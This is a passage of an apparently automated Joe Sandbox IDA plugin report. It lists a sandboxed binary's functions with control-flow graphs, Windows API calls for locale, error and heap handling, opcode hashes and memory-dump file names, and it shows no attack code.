                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileHandleType
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3000768030-0
                                                                                                                                                                                                                                                                  • Opcode ID: c2282726b0b5cf086995f808df833536bfbab8004f003a954e557579bd6f0212
                                                                                                                                                                                                                                                                  • Instruction ID: cca51844c99d1c69a1d982e7755d1170c7ebdde565874ed260ef6bf2efca7a1a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2282726b0b5cf086995f808df833536bfbab8004f003a954e557579bd6f0212
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5111903560475146C730DA3E8CE8B726A96EF56370B38075ED1B7C76F1CF24E8829285
                                                                                                                                                                                                                                                                  Function 006C4607 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 234 6c4607-6c4616 call 6c3b8b 237 6c463f-6c4659 call 633dd7 LCMapStringW 234->237 238 6c4618-6c463d LCMapStringEx 234->238 242 6c465f-6c4661 237->242 238->242
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • LCMapStringEx.KERNELBASE(?,006C9ED3,?,?,00000000,?,00000000,00000000,00000000), ref: 006C463B
                                                                                                                                                                                                                                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?), ref: 006C4659
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: String
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2568140703-0
                                                                                                                                                                                                                                                                  • Opcode ID: 499698e0aefa020cb23a922ee172f453f4f2eb5a2a677407b2ea0dd2f2edc347
                                                                                                                                                                                                                                                                  • Instruction ID: 6ff32abcf5cf9eb93cedc90174f68e1b38d409e93bdc890859a876f75bdc22c5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 499698e0aefa020cb23a922ee172f453f4f2eb5a2a677407b2ea0dd2f2edc347
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5EF07A3640011ABBCF16AF91DC05EEE3F26EF49360F058019FA1825130CB36C932EB95
                                                                                                                                                                                                                                                                  Function 00689296 Relevance: 2.5, APIs: 2, Instructions: 31COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 339 689296-6892ad GetLastError 340 6892ba 339->340 341 6892af-6892b8 339->341 342 6892bd-6892c2 call 63163b 340->342 341->342 344 6892c7-6892db SetLastError 342->344
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,006895AC), ref: 006892A0
                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?), ref: 006892D0
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7d8d063effe41a6d38056624e1e4f7362efdc9183b3e76beafc1a27cabb056b7
                                                                                                                                                                                                                                                                  • Instruction ID: cb86729dbcff1238131e3e8f84a8156e7938ede7e71ed740f4c7a65b2fbb22cc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7d8d063effe41a6d38056624e1e4f7362efdc9183b3e76beafc1a27cabb056b7
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DF08CB2504205FFCB009BA9D909A8AFBE9EB56350F24865AF005C3610EBB5EA01C7E4
                                                                                                                                                                                                                                                                  Function 006C35B5 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 345 6c35b5-6c35c0 346 6c35ce-6c35d4 345->346 347 6c35c2-6c35cc 345->347 349 6c35ed-6c35fe RtlAllocateHeap 346->349 350 6c35d6-6c35d7 346->350 347->346 348 6c3602-6c360d call 633bbb 347->348 354 6c360f-6c3611 348->354 351 6c35d9-6c35e0 call 634ae8 349->351 352 6c3600 349->352 350->349 351->348 358 6c35e2-6c35eb call 634345 351->358 352->354 358->348 358->349
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000008,?), ref: 006C35F6
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                  • Opcode ID: 77e2d82cd8331cd50e830bf9367826e4c69cfb0ba0930dfe57b2c3de9c4347d2
                                                                                                                                                                                                                                                                  • Instruction ID: 5e71e5e56071fa128e549d93318326c4d8fd45d59e19bfa9c6d474a9b197ad67
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77e2d82cd8331cd50e830bf9367826e4c69cfb0ba0930dfe57b2c3de9c4347d2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3F0B4316042347B9B615A239C02FBB7B8BEF41760B55C01EF8059B390CF20DE0186E8

                                                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                                                  Function 006D580A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 006D58A3
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 006D58CC
                                                                                                                                                                                                                                                                  • GetACP.KERNEL32 ref: 006D58E1
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                  • String ID: ACP$OCP
                                                                                                                                                                                                                                                                  • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                  • Opcode ID: 0f27ba9c4623ac7d0d789748e2fd4397054289dc9165247dcbbb0d4beb4542f3
                                                                                                                                                                                                                                                                  • Instruction ID: d8d8018b1c74c13e78c09262475132cadd20f2f5dd6748b5323622d7fb9822d7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f27ba9c4623ac7d0d789748e2fd4397054289dc9165247dcbbb0d4beb4542f3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8821B332E00925ABDB389F14C941AE777A7EF50B50B568426E90BD7B10EB32DD41E350
                                                                                                                                                                                                                                                                  Function 006D5A53 Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32 ref: 006D5B5F
                                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 006D5BA8
                                                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 006D5BB7
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 006D5BFF
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 006D5C1E
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Locale$InfoValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3475089800-0
                                                                                                                                                                                                                                                                  • Opcode ID: 9defa09d41cc6d4712f40fee4ef471dc3b96de5e76ddf96a023286cea6a2fcd5
                                                                                                                                                                                                                                                                  • Instruction ID: 17d76494246ad8c28a83b8c2aff352eafe741db9b34a9d6ae81501c3656bc0a9
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9defa09d41cc6d4712f40fee4ef471dc3b96de5e76ddf96a023286cea6a2fcd5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE517171E00A099FDB10DFA5CC91AFA77BAAF48700F18446BE512EB791E7709A04CB64
                                                                                                                                                                                                                                                                  Function 006DC82F Relevance: 7.4, Strings: 4, Instructions: 2437COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                  • API String ID: 0-2761157908
                                                                                                                                                                                                                                                                  • Opcode ID: adf9c4f2041852f0d0bc4decdd1d849b3ad7bedf165aa779f9a0b340623f2351
                                                                                                                                                                                                                                                                  • Instruction ID: 1d6827c9afc00303b6c97c9ef853b9e057b28a3afcf52a9b9e534458b710ddaa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: adf9c4f2041852f0d0bc4decdd1d849b3ad7bedf165aa779f9a0b340623f2351
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D1D20571E082298BDB65DE28DC40BEAB7BAEB45314F1441EAD40DE7340E778AE85CF41
                                                                                                                                                                                                                                                                  Function 006D4E77 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetACP.KERNEL32 ref: 006D4F38
                                                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 006D4F63
                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 006D5144
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CodeInfoLocalePageValid
                                                                                                                                                                                                                                                                  • String ID: utf8
                                                                                                                                                                                                                                                                  • API String ID: 790303815-905460609
                                                                                                                                                                                                                                                                  • Opcode ID: 05003210c203f3bc2eaac88360613f4f574d8c39013f3db340858f651c94813a
                                                                                                                                                                                                                                                                  • Instruction ID: cf2cfc6148ba1d42e0accd9711c7c7e60763315022fe03e5d84037ba02852d25
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 05003210c203f3bc2eaac88360613f4f574d8c39013f3db340858f651c94813a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2271D371E00606ABDB24AB35CC46BBA73AAEF49300F14446BF506D7781EFB5ED4186E4
                                                                                                                                                                                                                                                                  Function 00680D28 Relevance: 6.2, Strings: 4, Instructions: 1201COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1610432036.0000000000640000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610416919.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.0000000000631000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.000000000063C000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006E7000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610432036.00000000006EE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610561900.00000000006F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000705000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610588292.0000000000738000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610624075.0000000000742000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610636515.0000000000744000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610651504.0000000000745000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000747000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1610663469.0000000000749000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_630000_file.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: <o$ <o$(<o$/
                                                                                                                                                                                                                                                                  • API String ID: 0-3407706917
                                                                                                                                                                                                                                                                  • Opcode ID: 932258d76e93dbdda046e4122ae974754d7741c7137f003d47dd24dcaed30c86
                                                                                                                                                                                                                                                                  • Instruction ID: c67ad064a7d924631fc1cb4939ad5d1e60bc13f2c063bdb16de270f942fe2e7d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 932258d76e93dbdda046e4122ae974754d7741c7137f003d47dd24dcaed30c86
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C79273B2E106199BDB14EFA8CC95BED77BAAB15300F04423DF512EB380DB68D949CB54
